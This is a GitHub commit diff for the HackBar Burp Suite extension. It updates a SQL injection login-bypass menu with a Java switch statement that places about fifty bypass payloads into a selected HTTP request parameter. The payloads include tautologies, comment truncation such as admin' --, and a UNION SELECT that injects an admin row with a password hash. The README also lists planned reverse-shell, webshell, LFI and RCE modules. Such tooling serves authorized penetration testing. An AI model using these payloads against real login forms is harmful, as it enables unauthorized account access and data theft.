Skip to content

Commit a4bb3d6

Browse files
rootroot
root
authored and
root
committed
Updated SQLi Login bypass
1 parent 6a2a55a commit a4bb3d6

File tree

5 files changed

+155
-10
lines changed

5 files changed

+155
-10
lines changed

README.md

Lines changed: 4 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -19,12 +19,12 @@
1919

2020
### Download
2121

22-
Download Jar https://github.com/d3vilbug/HackBar/releases and add in burpsuite
22+
Download Jar 'https://github.com/d3vilbug/HackBar/releases' and add in burpsuite
2323

2424
### Tested on
2525
- Burpsuite 1.7.36
2626
- Windows 7/8.1/10
27-
- Kali linux (2013.3)
27+
- Kali linux (2018.3)
2828

2929
### Upcoming Features/Modules
3030
- XSS payload
@@ -34,9 +34,10 @@
3434
- Reverse Shell Code snippets
3535
- Decoder/Encoder
3636
- LFI payloads
37-
- XXE
37+
- XXE
3838
- RCE
3939
- Mini Webshells
40+
- Simulate Attack (Automatically test complete cheat sheet with one click)
4041

4142
### Greet
4243
- An0n 3xPloiTeR https://github.com/Anon-Exploiter/ for SQLi && XSS payloads

build/built-jar.properties

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,4 @@
1-
#Fri, 07 Sep 2018 00:39:59 +0500
1+
#Sat, 08 Sep 2018 01:56:29 +0500
22

33

44
C\:\\Users\\bugzy\\Documents\\NetBeansProjects\\Burp_Plugins\\HackBar=

build/classes/burp/SQL_Menu.class

-2 Bytes
Binary file not shown.

nbproject/private/private.xml

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -3,7 +3,10 @@
33
<editor-bookmarks xmlns="http://www.netbeans.org/ns/editor-bookmarks/2" lastBookmarkId="0"/>
44
<open-files xmlns="http://www.netbeans.org/ns/projectui-open-files/2">
55
<group>
6+
<file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/Methods.java</file>
7+
<file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/SQli_LoginBypass.java</file>
68
<file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/SQL_Menu.java</file>
9+
<file>file:/C:/Users/bugzy/Documents/NetBeansProjects/Burp_Plugins/HackBar/src/burp/BurpExtender.java</file>
710
</group>
811
</open-files>
912
</project-private>

src/burp/SQli_LoginBypass.java

Lines changed: 147 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -21,7 +21,7 @@ public class SQli_LoginBypass extends JMenu {
2121
public String[] Login_Menu = {"Set 1","Set 2","Set 3","Set 4","Set 5"};
2222
public String LoginMenuItems[][] = {
2323
{"' or ''='", "' or 1='1", "' or '1'='1", "' or ' 1=1", "' or 1=1--", "' or 1=1#", "' or 1=1/*", "') or '1'='1--", "') or ('1'='1--", "' or 1=1)#"},
24-
{"' or '1?='1", "' or 'x'='x", "' or 0=0 –", "or 0=0 –", "' or 0=0 #", "or 0=0 #", "' or 'x'='x", "') or ('x'='x", "' or 1=1–", "' or a=a–"},
24+
{"' or '1?='1", "' or 'x'='x", "' or 0=0 –", "or 0=0 –", "' or 0=0 #", "or 0=0 #", "') or ('x'='x", "' or 1=1–", "' or a=a–"},
2525
{"') or ('a'='a", "hi' or 1=1 –", "'or'1=1?", "'-'", "' '", "'&'", "'^'", "'*'", "' or ''-'", "' or '' '"},
2626
{"' or ''&'", "' or ''^'", "' or ''*'", "or true--", "' or true--", "') or ('x')=('x", "')) or (('x'))=(('x", "admin' --", "admin' #", "admin'/*"},
2727
{"admin' or '1'='1", "admin' or '1'='1'--", "admin' or '1'='1'#", "admin' or '1'='1'/*", "admin'or 1=1 or ''='", "admin') or ('1'='1", "admin') or ('1'='1'/*", "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055"},
@@ -57,14 +57,155 @@ public void actionPerformed(ActionEvent e) {
5757
String action = e.getActionCommand();
5858
byte[] newRequest = do_loginBypass(request, selectString, action, selectedIndex);
5959
req.setRequest(newRequest);
60-
JOptionPane.showMessageDialog(null, action);
6160
}
6261

6362
public byte[] do_loginBypass(byte[] request, String selectedString, String action, int[] selectedIndex){
64-
// swtich(action){
65-
// case " a":
66-
// break;
67-
// }
63+
switch(action){
64+
case "' or ''='":
65+
selectedString = "' or ''='";
66+
break;
67+
case "' or 1='1":
68+
selectedString = "' or 1='1";
69+
break;
70+
case "' or '1'='1":
71+
selectedString = "' or '1'='1";
72+
break;
73+
case "' or ' 1=1":
74+
selectedString = "' or ' 1=1";
75+
break;
76+
case "' or 1=1--":
77+
selectedString = "' or 1=1--";
78+
break;
79+
case "' or 1=1#":
80+
selectedString = "' or 1=1#";
81+
break;
82+
case "' or 1=1/*":
83+
selectedString = "' or 1=1/*";
84+
break;
85+
case "') or '1'='1--":
86+
selectedString = "') or '1'='1--";
87+
break;
88+
case "') or ('1'='1--":
89+
selectedString = "') or ('1'='1--";
90+
break;
91+
case "' or 1=1)#":
92+
selectedString = "' or 1=1)#";
93+
break;
94+
case "' or '1?='1":
95+
selectedString = "' or '1?='1";
96+
break;
97+
case "' or 'x'='x":
98+
selectedString = "' or 'x'='x";
99+
break;
100+
case "' or 0=0 –":
101+
selectedString = "' or 0=0 –";
102+
break;
103+
case "or 0=0 –":
104+
selectedString = "or 0=0 –";
105+
break;
106+
case "' or 0=0 #":
107+
selectedString = "' or 0=0 #";
108+
break;
109+
case "or 0=0 #":
110+
selectedString = "or 0=0 #";
111+
break;
112+
case "') or ('x'='x":
113+
selectedString = "') or ('x'='x";
114+
break;
115+
case "' or 1=1–":
116+
selectedString = "' or 1=1–";
117+
break;
118+
case "' or a=a–":
119+
selectedString = "' or a=a–";
120+
break;
121+
case "') or ('a'='a":
122+
selectedString = "') or ('a'='a";
123+
break;
124+
case "hi' or 1=1 –":
125+
selectedString = "hi' or 1=1 –";
126+
break;
127+
case "'or'1=1?":
128+
selectedString = "'or'1=1?";
129+
break;
130+
case "'-'":
131+
selectedString = "'-'";
132+
break;
133+
case "' '":
134+
selectedString = "' '";
135+
break;
136+
case "'&'":
137+
selectedString = "'&'";
138+
break;
139+
case "'^'":
140+
selectedString = "'^'";
141+
break;
142+
case "'*'":
143+
selectedString = "'*'";
144+
break;
145+
case "' or ''-'":
146+
selectedString = "' or ''-'";
147+
break;
148+
case "' or '' '":
149+
selectedString = "' or '' '";
150+
break;
151+
case "' or ''&'":
152+
selectedString = "' or ''&'";
153+
break;
154+
case "' or ''^'":
155+
selectedString = "' or ''^'";
156+
break;
157+
case "' or ''*'":
158+
selectedString = "' or ''*'";
159+
break;
160+
case "or true--":
161+
selectedString = "or true--";
162+
break;
163+
case "' or true--":
164+
selectedString = "' or true--";
165+
break;
166+
case "') or ('x')=('x":
167+
selectedString = "') or ('x')=('x";
168+
break;
169+
case "')) or (('x'))=(('x":
170+
selectedString = "')) or (('x'))=(('x";
171+
break;
172+
case "admin' --":
173+
selectedString = "admin' --";
174+
break;
175+
case "admin' #":
176+
selectedString = "admin' #";
177+
break;
178+
case "admin'/*":
179+
selectedString = "admin'/*";
180+
break;
181+
case "admin' or '1'='1":
182+
selectedString = "admin' or '1'='1";
183+
break;
184+
case "admin' or '1'='1'--":
185+
selectedString = "admin' or '1'='1'--";
186+
break;
187+
case "admin' or '1'='1'#":
188+
selectedString = "admin' or '1'='1'#";
189+
break;
190+
case "admin' or '1'='1'/*":
191+
selectedString = "admin' or '1'='1'/*";
192+
break;
193+
case "admin'or 1=1 or ''='":
194+
selectedString = "admin'or 1=1 or ''='";
195+
break;
196+
case "admin') or ('1'='1":
197+
selectedString = "admin') or ('1'='1";
198+
break;
199+
case "admin') or ('1'='1'/*":
200+
selectedString = "admin') or ('1'='1'/*";
201+
break;
202+
case "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055":
203+
selectedString = "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055";
204+
break;
205+
default:
206+
selectedString = selectedString;
207+
}
208+
selectedString = selectedString.replace(" ", "+");
68209
return Methods.do_modify_request(request, selectedIndex, selectedString);
69210
}
70211

0 commit comments

Comments
 (0)